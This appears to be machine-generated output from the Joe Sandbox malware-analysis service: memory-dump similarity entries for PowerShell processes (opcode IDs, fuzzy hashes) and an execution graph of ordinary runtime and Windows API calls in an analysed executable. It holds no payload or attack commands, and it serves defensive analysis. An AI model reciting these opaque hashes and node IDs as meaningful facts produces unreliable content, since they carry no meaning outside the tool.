                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 37cbd37ab7ba30f8d3f94edd3cc9d453adb40fd08cd196ee33b42f1ae426a0f2
                                                                                                                                                                                • Instruction ID: 2c8b1e84f9eb22076978832d356e0abcece317f266f334347a4816db192fe3bd
                                                                                                                                                                                • Opcode Fuzzy Hash: 37cbd37ab7ba30f8d3f94edd3cc9d453adb40fd08cd196ee33b42f1ae426a0f2
                                                                                                                                                                                • Instruction Fuzzy Hash: 4BC12732B1EA4D5FEBA8DB6898A46B477D1FF98714F1901BED44DC32A2DE25AC01C740
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.2669181632.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffd9b8a0000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 7e3f66ddd574c0af08e81a6a1c9bf0a66f23b8602905d0de1fbc826de9b6d032
                                                                                                                                                                                • Instruction ID: 2d8e5c199f5335979778887b622e34919a8febb75adba4d6537578fae4bb4e89
                                                                                                                                                                                • Opcode Fuzzy Hash: 7e3f66ddd574c0af08e81a6a1c9bf0a66f23b8602905d0de1fbc826de9b6d032
                                                                                                                                                                                • Instruction Fuzzy Hash: 8601677121CB0D4FD748EF0CE451AA6B7E0FB99364F10056DE58AC36A5DA36E882CB45
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.2849376344.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_7ffd9b970000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 019de5bb1e77f0a0a50a49622d7e2a319a0c71e9c8f2cbe03c0bf3639a387d68
                                                                                                                                                                                • Instruction ID: becc08a0691e2c429a8eafaac2e537da8cb1a89897578c7a9c65fbc108207fd4
                                                                                                                                                                                • Opcode Fuzzy Hash: 019de5bb1e77f0a0a50a49622d7e2a319a0c71e9c8f2cbe03c0bf3639a387d68
                                                                                                                                                                                • Instruction Fuzzy Hash: 2EC15832B1EA8D5FEBA4EBA848A55B57BE1EF55310F0901FED45CC70E7D918A9018341
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.2838917134.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_7ffd9b8a0000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 7644c28739e31176675778a6c06605b630804a1a1a7635ef59980513586a68f2
                                                                                                                                                                                • Instruction ID: ea8ef1c203c32e03783ccc5916dd621f0efda988e937b66219651f9556e4c652
                                                                                                                                                                                • Opcode Fuzzy Hash: 7644c28739e31176675778a6c06605b630804a1a1a7635ef59980513586a68f2
                                                                                                                                                                                • Instruction Fuzzy Hash: 24519C3160EB8A5FE319DB28C8A58647BE0FF56314B1802BEC0D9C75A3ED25B847C751
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.2838917134.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_7ffd9b8a0000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: c2d7ebd6542cfe8aa3c27a3bf09e0e3d8dcf1be9b74217d06d2e538f2b871788
                                                                                                                                                                                • Instruction ID: cb8287a62b6f60742b4898cb2037484a0ff83743f6476a00d913aaea6774fe45
                                                                                                                                                                                • Opcode Fuzzy Hash: c2d7ebd6542cfe8aa3c27a3bf09e0e3d8dcf1be9b74217d06d2e538f2b871788
                                                                                                                                                                                • Instruction Fuzzy Hash: 1C31E971A1DB4C9FDB5C9B5CA84A6E9BBE0FB99710F00412FE449C3252DB20A955CBC2
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.2822445802.00007FFD9B78D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B78D000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_7ffd9b78d000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 6c267055943c2ed54b5f28122be65291514b9bea7346db8252816412689e106f
                                                                                                                                                                                • Instruction ID: 47f1f291705a276a3c6a56a9aeaf3059a4a0f30289e7f27d07fc8d76c29976e6
                                                                                                                                                                                • Opcode Fuzzy Hash: 6c267055943c2ed54b5f28122be65291514b9bea7346db8252816412689e106f
                                                                                                                                                                                • Instruction Fuzzy Hash: 5141257150EBC44FE7569B28D8559523FF0EF52321B1906DFD088CB1B3D725A846C792
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.2838917134.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_7ffd9b8a0000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 18fa99c3be3da498b30cb8c32c9d2a0d2a1aadac0d16dfd07bfa4f49e884f64d
                                                                                                                                                                                • Instruction ID: de342aa6ad75306128ea2ffa1f42594d41261f5a7a7e31c16672f852f1c99059
                                                                                                                                                                                • Opcode Fuzzy Hash: 18fa99c3be3da498b30cb8c32c9d2a0d2a1aadac0d16dfd07bfa4f49e884f64d
                                                                                                                                                                                • Instruction Fuzzy Hash: 3331F73190DB8C4FDB59DBA898596E97FE0EF66320F0441AFD049C7163D678580ACB52
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.2838917134.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_7ffd9b8a0000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 5f36abceedb2ff7a5a4107e1baa7ee65573aa8b99880c3efb38f262d1595353a
                                                                                                                                                                                • Instruction ID: d7bf8f3c6d35c24e9dab6177481c03bd42b0d2a39a20293235fd619efd113965
                                                                                                                                                                                • Opcode Fuzzy Hash: 5f36abceedb2ff7a5a4107e1baa7ee65573aa8b99880c3efb38f262d1595353a
                                                                                                                                                                                • Instruction Fuzzy Hash: 36214B7290FACD7FD721CF648C650A83FA0FF25604F0911FBC4998B463EE2825458B92
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.2838917134.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_7ffd9b8a0000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 7e3f66ddd574c0af08e81a6a1c9bf0a66f23b8602905d0de1fbc826de9b6d032
                                                                                                                                                                                • Instruction ID: 2d8e5c199f5335979778887b622e34919a8febb75adba4d6537578fae4bb4e89
                                                                                                                                                                                • Opcode Fuzzy Hash: 7e3f66ddd574c0af08e81a6a1c9bf0a66f23b8602905d0de1fbc826de9b6d032
                                                                                                                                                                                • Instruction Fuzzy Hash: 8601677121CB0D4FD748EF0CE451AA6B7E0FB99364F10056DE58AC36A5DA36E882CB45
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.2849376344.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_7ffd9b970000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 9820f546ee2de6db86a8ddf4ffe6efc22c75cd3d422e35d6bf3d3a0799e4b71f
                                                                                                                                                                                • Instruction ID: dc66fbef532d3b88a886fb64ea44960147d7784db491956fd33d890d7adf18b0
                                                                                                                                                                                • Opcode Fuzzy Hash: 9820f546ee2de6db86a8ddf4ffe6efc22c75cd3d422e35d6bf3d3a0799e4b71f
                                                                                                                                                                                • Instruction Fuzzy Hash: 50F0BE32B1E5098FD768EA5CE4919A873E0EF65330B1640BAE06DC76B3CA25EC40C745
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.2849376344.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_7ffd9b970000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: d6f4bc8122bacbae6aa44f78e3df031e92895dd5e75308ff5043c188297f90a1
                                                                                                                                                                                • Instruction ID: 329026db852129f88535cebd800922a2752c862269b39035a986aaa27a932cf3
                                                                                                                                                                                • Opcode Fuzzy Hash: d6f4bc8122bacbae6aa44f78e3df031e92895dd5e75308ff5043c188297f90a1
                                                                                                                                                                                • Instruction Fuzzy Hash: 75F0BE32B0E5498FD764EA5CE4A09A873E0EF05320B1600BAE05DCB1B3CA25AC40C750
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.2849376344.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_7ffd9b970000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                                                                                                                • Instruction ID: 664ee9e526855705bcffdcfcbd412457206555aceccb5f816b9e306c4c7c1cf4
                                                                                                                                                                                • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                                                                                                                • Instruction Fuzzy Hash: 43E0123171C4089FD678EA4CE0919AD73E5EBA833171241BBD14EC7672CA21ED518B85
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.2838917134.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_7ffd9b8a0000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: L_^5$L_^8$L_^F$L_^I$L_^K
                                                                                                                                                                                • API String ID: 0-3847582561
                                                                                                                                                                                • Opcode ID: 91bfba94832802edee52879ad1a49d538ed21ee38dc412c56f7241ee861ed7f9
                                                                                                                                                                                • Instruction ID: c570d076eeb12835a518e1baf60f5fb762b48af022766ff4ca14cc2482e8c46f
                                                                                                                                                                                • Opcode Fuzzy Hash: 91bfba94832802edee52879ad1a49d538ed21ee38dc412c56f7241ee861ed7f9
                                                                                                                                                                                • Instruction Fuzzy Hash: 6621F5B77141258AD306776DBC159ED7784CF8427934992F3D2A88F553EE14608B8A90
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.2838917134.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_7ffd9b8a0000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: L_^$L_^$L_^$L_^
                                                                                                                                                                                • API String ID: 0-2357752022
                                                                                                                                                                                • Opcode ID: 43278445ab522ed42d22f5ba2f0dffc5591d620afab75b1d2773fd866f3d6f24
                                                                                                                                                                                • Instruction ID: aa9dd02fbd065fbaf5b40ec80b5cb2d05dbe05e3ea14e389f1afadefcdce9de6
                                                                                                                                                                                • Opcode Fuzzy Hash: 43278445ab522ed42d22f5ba2f0dffc5591d620afab75b1d2773fd866f3d6f24
                                                                                                                                                                                • Instruction Fuzzy Hash: 9B3116A3B0FAC61FE366476A48B50986BA0FF6675875E13F2C1D40F0A3ED14394746A3

                                                                                                                                                                                Execution Graph

                                                                                                                                                                                Execution Coverage:9.5%
                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                Signature Coverage:19.3%
                                                                                                                                                                                Total number of Nodes:2000
                                                                                                                                                                                Total number of Limit Nodes:22
                                                                                                                                                                                execution_graph 19284 7ff72b06b830 19295 7ff72b06f5e8 EnterCriticalSection 19284->19295 19941 7ff72b06ec9c 19942 7ff72b06ee8e 19941->19942 19944 7ff72b06ecde _isindst 19941->19944 19943 7ff72b0643f4 _get_daylight 11 API calls 19942->19943 19961 7ff72b06ee7e 19943->19961 19944->19942 19947 7ff72b06ed5e _isindst 19944->19947 19945 7ff72b05b870 _log10_special 8 API calls 19946 7ff72b06eea9 19945->19946 19962 7ff72b0754a4 19947->19962 19952 7ff72b06eeba 19954 7ff72b069c10 _isindst 17 API calls 19952->19954 19956 7ff72b06eece 19954->19956 19959 7ff72b06edbb 19959->19961 19987 7ff72b0754e8 19959->19987 19961->19945 19963 7ff72b0754b3 19962->19963 19964 7ff72b06ed7c 19962->19964 19994 7ff72b06f5e8 EnterCriticalSection 19963->19994 19969 7ff72b0748a8 19964->19969 19970 7ff72b06ed91 19969->19970 19971 7ff72b0748b1 19969->19971 19970->19952 19975 7ff72b0748d8 19970->19975 19972 7ff72b0643f4 _get_daylight 11 API calls 19971->19972 19973 7ff72b0748b6 19972->19973 19974 7ff72b069bf0 _invalid_parameter_noinfo 37 API calls 19973->19974 19974->19970 19976 7ff72b0748e1 19975->19976 19980 7ff72b06eda2 19975->19980 19977 7ff72b0643f4 _get_daylight 11 API calls 19976->19977 19978 7ff72b0748e6 19977->19978 19979 7ff72b069bf0 _invalid_parameter_noinfo 37 API calls 19978->19979 19979->19980 19980->19952 19981 7ff72b074908 19980->19981 19982 7ff72b06edb3 19981->19982 19983 7ff72b074911 19981->19983 19982->19952 19982->19959 19984 7ff72b0643f4 _get_daylight 11 API calls 19983->19984 19985 7ff72b074916 19984->19985 19986 7ff72b069bf0 _invalid_parameter_noinfo 37 API calls 19985->19986 19986->19982 19995 7ff72b06f5e8 EnterCriticalSection 19987->19995 19330 7ff72b064720 19331 7ff72b06472b 19330->19331 19339 7ff72b06e5b4 19331->19339 19352 7ff72b06f5e8 EnterCriticalSection 19339->19352 18468 7ff72b064938 18469 7ff72b06496f 18468->18469 18470 7ff72b064952 18468->18470 18469->18470 18471 7ff72b064982 CreateFileW 18469->18471 18472 7ff72b0643d4 _fread_nolock 11 API calls 18470->18472 18473 7ff72b0649ec 18471->18473 18474 7ff72b0649b6 18471->18474 18475 7ff72b064957 18472->18475 18519 7ff72b064f14 18473->18519 18493 7ff72b064a8c GetFileType 18474->18493 18478 7ff72b0643f4 _get_daylight 11 API calls 18475->18478 18481 7ff72b06495f 18478->18481 18482 7ff72b069bf0 _invalid_parameter_noinfo 37 API calls 18481->18482 18488 7ff72b06496a 18482->18488 18483 7ff72b0649cb CloseHandle 18483->18488 18484 7ff72b0649e1 CloseHandle 18484->18488 18485 7ff72b0649f5 18489 7ff72b064368 _fread_nolock 11 API calls 18485->18489 18486 7ff72b064a20 18540 7ff72b064cd4 18486->18540 18492 7ff72b0649ff 18489->18492 18492->18488 18494 7ff72b064b97 18493->18494 18495 7ff72b064ada 18493->18495 18497 7ff72b064b9f 18494->18497 18498 7ff72b064bc1 18494->18498 18496 7ff72b064b06 GetFileInformationByHandle 18495->18496 18499 7ff72b064e10 21 API calls 18495->18499 18500 7ff72b064b2f 18496->18500 18501 7ff72b064bb2 GetLastError 18496->18501 18497->18501 18502 7ff72b064ba3 18497->18502 18503 7ff72b064be4 PeekNamedPipe 18498->18503 18510 7ff72b064b82 18498->18510 18504 7ff72b064af4 18499->18504 18505 7ff72b064cd4 51 API calls 18500->18505 18507 7ff72b064368 _fread_nolock 11 API calls 18501->18507 18506 7ff72b0643f4 _get_daylight 11 API calls 18502->18506 18503->18510 18504->18496 18504->18510 18509 7ff72b064b3a 18505->18509 18506->18510 18507->18510 18508 7ff72b05b870 _log10_special 8 API calls 18511 7ff72b0649c4 18508->18511 18557 7ff72b064c34 18509->18557 18510->18508 18511->18483 18511->18484 18514 7ff72b064c34 10 API calls 18515 7ff72b064b59 18514->18515 18516 7ff72b064c34 10 API calls 18515->18516 18517 7ff72b064b6a 18516->18517 18517->18510 18518 7ff72b0643f4 _get_daylight 11 API calls 18517->18518 18518->18510 18520 7ff72b064f4a 18519->18520 18521 7ff72b0643f4 _get_daylight 11 API calls 18520->18521 18539 7ff72b064fe2 __vcrt_freefls 18520->18539 18523 7ff72b064f5c 18521->18523 18522 7ff72b05b870 _log10_special 8 API calls 18524 7ff72b0649f1 18522->18524 18525 7ff72b0643f4 _get_daylight 11 API calls 18523->18525 18524->18485 18524->18486 18526 7ff72b064f64 18525->18526 18527 7ff72b067118 45 API calls 18526->18527 18528 7ff72b064f79 18527->18528 18529 7ff72b064f8b 18528->18529 18530 7ff72b064f81 18528->18530 18532 7ff72b0643f4 _get_daylight 11 API calls 18529->18532 18531 7ff72b0643f4 _get_daylight 11 API calls 18530->18531 18536 7ff72b064f86 18531->18536 18533 7ff72b064f90 18532->18533 18534 7ff72b0643f4 _get_daylight 11 API calls 18533->18534 18533->18539 18535 7ff72b064f9a 18534->18535 18537 7ff72b067118 45 API calls 18535->18537 18538 7ff72b064fd4 GetDriveTypeW 18536->18538 18536->18539 18537->18536 18538->18539 18539->18522 18542 7ff72b064cfc 18540->18542 18541 7ff72b064a2d 18550 7ff72b064e10 18541->18550 18542->18541 18564 7ff72b06ea34 18542->18564 18544 7ff72b064d90 18544->18541 18545 7ff72b06ea34 51 API calls 18544->18545 18546 7ff72b064da3 18545->18546 18546->18541 18547 7ff72b06ea34 51 API calls 18546->18547 18548 7ff72b064db6 18547->18548 18548->18541 18549 7ff72b06ea34 51 API calls 18548->18549 18549->18541 18551 7ff72b064e2a 18550->18551 18552 7ff72b064e61 18551->18552 18553 7ff72b064e3a 18551->18553 18554 7ff72b06e8c8 21 API calls 18552->18554 18555 7ff72b064368 _fread_nolock 11 API calls 18553->18555 18556 7ff72b064e4a 18553->18556 18554->18556 18555->18556 18556->18492 18558 7ff72b064c5d FileTimeToSystemTime 18557->18558 18559 7ff72b064c50 18557->18559 18560 7ff72b064c71 SystemTimeToTzSpecificLocalTime 18558->18560 18561 7ff72b064c58 18558->18561 18559->18558 18559->18561 18560->18561 18562 7ff72b05b870 _log10_special 8 API calls 18561->18562 18563 7ff72b064b49 18562->18563 18563->18514 18565 7ff72b06ea65 18564->18565 18566 7ff72b06ea41 18564->18566 18568 7ff72b06ea9f 18565->18568 18572 7ff72b06eabe 18565->18572 18566->18565 18567 7ff72b06ea46 18566->18567 18569 7ff72b0643f4 _get_daylight 11 API calls 18567->18569 18571 7ff72b0643f4 _get_daylight 11 API calls 18568->18571 18570 7ff72b06ea4b 18569->18570 18573 7ff72b069bf0 _invalid_parameter_noinfo 37 API calls 18570->18573 18574 7ff72b06eaa4 18571->18574 18575 7ff72b064178 45 API calls 18572->18575 18576 7ff72b06ea56 18573->18576 18577 7ff72b069bf0 _invalid_parameter_noinfo 37 API calls 18574->18577 18580 7ff72b06eacb 18575->18580 18576->18544 18578 7ff72b06eaaf 18577->18578 18578->18544 18579 7ff72b06f7ec 51 API calls 18579->18580 18580->18578 18580->18579 20085 7ff72b0709c0 20096 7ff72b0766f4 20085->20096 20097 7ff72b076701 20096->20097 20098 7ff72b069c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20097->20098 20099 7ff72b07671d 20097->20099 20098->20097 20100 7ff72b069c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20099->20100 20101 7ff72b0709c9 20099->20101 20100->20099 20102 7ff72b06f5e8 EnterCriticalSection 20101->20102 20129 7ff72b079ef3 20131 7ff72b079f03 20129->20131 20133 7ff72b064788 LeaveCriticalSection 20131->20133 19447 7ff72b05be70 19448 7ff72b05be80 19447->19448 19464 7ff72b068ec0 19448->19464 19450 7ff72b05be8c 19470 7ff72b05c168 19450->19470 19452 7ff72b05bef9 19453 7ff72b05c44c 7 API calls 19452->19453 19463 7ff72b05bf15 19452->19463 19455 7ff72b05bf25 19453->19455 19454 7ff72b05bea4 _RTC_Initialize 19454->19452 19475 7ff72b05c318 19454->19475 19457 7ff72b05beb9 19478 7ff72b06832c 19457->19478 19465 7ff72b068ed1 19464->19465 19466 7ff72b068ed9 19465->19466 19467 7ff72b0643f4 _get_daylight 11 API calls 19465->19467 19466->19450 19468 7ff72b068ee8 19467->19468 19469 7ff72b069bf0 _invalid_parameter_noinfo 37 API calls 19468->19469 19469->19466 19471 7ff72b05c179 19470->19471 19474 7ff72b05c17e __scrt_release_startup_lock 19470->19474 19472 7ff72b05c44c 7 API calls 19471->19472 19471->19474 19473 7ff72b05c1f2 19472->19473 19474->19454 19503 7ff72b05c2dc 19475->19503 19477 7ff72b05c321 19477->19457 19479 7ff72b05bec5 19478->19479 19480 7ff72b06834c 19478->19480 19479->19452 19502 7ff72b05c3ec InitializeSListHead 19479->19502 19481 7ff72b06836a GetModuleFileNameW 19480->19481 19482 7ff72b068354 19480->19482 19486 7ff72b068395 19481->19486 19483 7ff72b0643f4 _get_daylight 11 API calls 19482->19483 19484 7ff72b068359 19483->19484 19485 7ff72b069bf0 _invalid_parameter_noinfo 37 API calls 19484->19485 19485->19479 19518 7ff72b0682cc 19486->19518 19489 7ff72b0683dd 19490 7ff72b0643f4 _get_daylight 11 API calls 19489->19490 19491 7ff72b0683e2 19490->19491 19494 7ff72b069c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19491->19494 19492 7ff72b0683f5 19493 7ff72b068417 19492->19493 19496 7ff72b06845c 19492->19496 19497 7ff72b068443 19492->19497 19495 7ff72b069c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19493->19495 19494->19479 19495->19479 19500 7ff72b069c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19496->19500 19498 7ff72b069c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19497->19498 19499 7ff72b06844c 19498->19499 19501 7ff72b069c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19499->19501 19500->19493 19501->19479 19504 7ff72b05c2f6 19503->19504 19506 7ff72b05c2ef 19503->19506 19507 7ff72b0694fc 19504->19507 19506->19477 19510 7ff72b069138 19507->19510 19517 7ff72b06f5e8 EnterCriticalSection 19510->19517 19519 7ff72b0682e4 19518->19519 19520 7ff72b06831c 19518->19520 19519->19520 19521 7ff72b06dea8 _get_daylight 11 API calls 19519->19521 19520->19489 19520->19492 19522 7ff72b068312 19521->19522 19523 7ff72b069c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19522->19523 19523->19520 15755 7ff72b05bf5c 15776 7ff72b05c12c 15755->15776 15758 7ff72b05c0a8 15899 7ff72b05c44c IsProcessorFeaturePresent 15758->15899 15760 7ff72b05c0b2 15762 7ff72b05c44c 7 API calls 15760->15762 15761 7ff72b05bf78 __scrt_acquire_startup_lock 15761->15760 15768 7ff72b05bf96 __scrt_release_startup_lock 15761->15768 15764 7ff72b05c0bd __GetCurrentState 15762->15764 15763 7ff72b05bfbb 15765 7ff72b05c041 15782 7ff72b05c594 15765->15782 15767 7ff72b05c046 15785 7ff72b051000 15767->15785 15768->15763 15768->15765 15888 7ff72b068e44 15768->15888 15773 7ff72b05c069 15773->15764 15895 7ff72b05c2b0 15773->15895 15777 7ff72b05c134 15776->15777 15778 7ff72b05c140 __scrt_dllmain_crt_thread_attach 15777->15778 15779 7ff72b05c14d 15778->15779 15781 7ff72b05bf70 15778->15781 15779->15781 15906 7ff72b05cba8 15779->15906 15781->15758 15781->15761 15933 7ff72b0797e0 15782->15933 15786 7ff72b051009 15785->15786 15935 7ff72b064794 15786->15935 15788 7ff72b05352b 15942 7ff72b0533e0 15788->15942 15794 7ff72b05356c 15797 7ff72b051bf0 49 API calls 15794->15797 15795 7ff72b053736 16142 7ff72b053f70 15795->16142 15816 7ff72b053588 15797->15816 15800 7ff72b053785 15802 7ff72b0525f0 53 API calls 15800->15802 15879 7ff72b053538 15802->15879 15804 7ff72b053778 15806 7ff72b05377d 15804->15806 15807 7ff72b05379f 15804->15807 15805 7ff72b05365f __vcrt_freefls 15810 7ff72b053834 15805->15810 15813 7ff72b057e10 14 API calls 15805->15813 16161 7ff72b05f36c 15806->16161 15809 7ff72b051bf0 49 API calls 15807->15809 15812 7ff72b0537be 15809->15812 15837 7ff72b053805 __vcrt_freefls 15810->15837 16165 7ff72b053e90 15810->16165 15823 7ff72b0518f0 115 API calls 15812->15823 15814 7ff72b0536ae 15813->15814 16017 7ff72b057f80 15814->16017 15815 7ff72b053852 15818 7ff72b053865 15815->15818 15819 7ff72b053871 15815->15819 16004 7ff72b057e10 15816->16004 16168 7ff72b053fe0 15818->16168 15822 7ff72b051bf0 49 API calls 15819->15822 15820 7ff72b0536bd 15824 7ff72b05380f 15820->15824 15827 7ff72b0536cf 15820->15827 15822->15837 15825 7ff72b0537df 15823->15825 16026 7ff72b058400 15824->16026 15825->15816 15826 7ff72b0537ef 15825->15826 15830 7ff72b0525f0 53 API calls 15826->15830 16022 7ff72b051bf0 15827->16022 15830->15879 15833 7ff72b05389e SetDllDirectoryW 15839 7ff72b0538c3 15833->15839 15836 7ff72b0536fc 16122 7ff72b0525f0 15836->16122 16077 7ff72b0586b0 15837->16077 15842 7ff72b053a50 15839->15842 16082 7ff72b056560 15839->16082 15844 7ff72b053a7d 15842->15844 15845 7ff72b053a5a PostMessageW GetMessageW 15842->15845 16226 7ff72b053080 15844->16226 15845->15844 15847 7ff72b0538ea 15848 7ff72b053947 15847->15848 15851 7ff72b053901 15847->15851 16171 7ff72b0565a0 15847->16171 15848->15842 15856 7ff72b05395c 15848->15856 15864 7ff72b053905 15851->15864 16192 7ff72b056970 15851->16192 16102 7ff72b0530e0 15856->16102 15858 7ff72b056780 FreeLibrary 15860 7ff72b053aa3 15858->15860 15864->15848 16208 7ff72b052870 15864->16208 16133 7ff72b05b870 15879->16133 15889 7ff72b068e5b 15888->15889 15890 7ff72b068e7c 15888->15890 15889->15765 18419 7ff72b0696e8 15890->18419 15893 7ff72b05c5d8 GetModuleHandleW 15894 7ff72b05c5e9 15893->15894 15894->15773 15896 7ff72b05c2c1 15895->15896 15897 7ff72b05c080 15896->15897 15898 7ff72b05cba8 7 API calls 15896->15898 15897->15763 15898->15897 15900 7ff72b05c472 _isindst __scrt_get_show_window_mode 15899->15900 15901 7ff72b05c491 RtlCaptureContext RtlLookupFunctionEntry 15900->15901 15902 7ff72b05c4ba RtlVirtualUnwind 15901->15902 15903 7ff72b05c4f6 __scrt_get_show_window_mode 15901->15903 15902->15903 15904 7ff72b05c528 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 15903->15904 15905 7ff72b05c576 _isindst 15904->15905 15905->15760 15907 7ff72b05cbba 15906->15907 15908 7ff72b05cbb0 15906->15908 15907->15781 15912 7ff72b05cf44 15908->15912 15913 7ff72b05cf53 15912->15913 15914 7ff72b05cbb5 15912->15914 15920 7ff72b05d180 15913->15920 15916 7ff72b05cfb0 15914->15916 15917 7ff72b05cfdb 15916->15917 15918 7ff72b05cfbe DeleteCriticalSection 15917->15918 15919 7ff72b05cfdf 15917->15919 15918->15917 15919->15907 15924 7ff72b05cfe8 15920->15924 15925 7ff72b05d0d2 TlsFree 15924->15925 15931 7ff72b05d02c 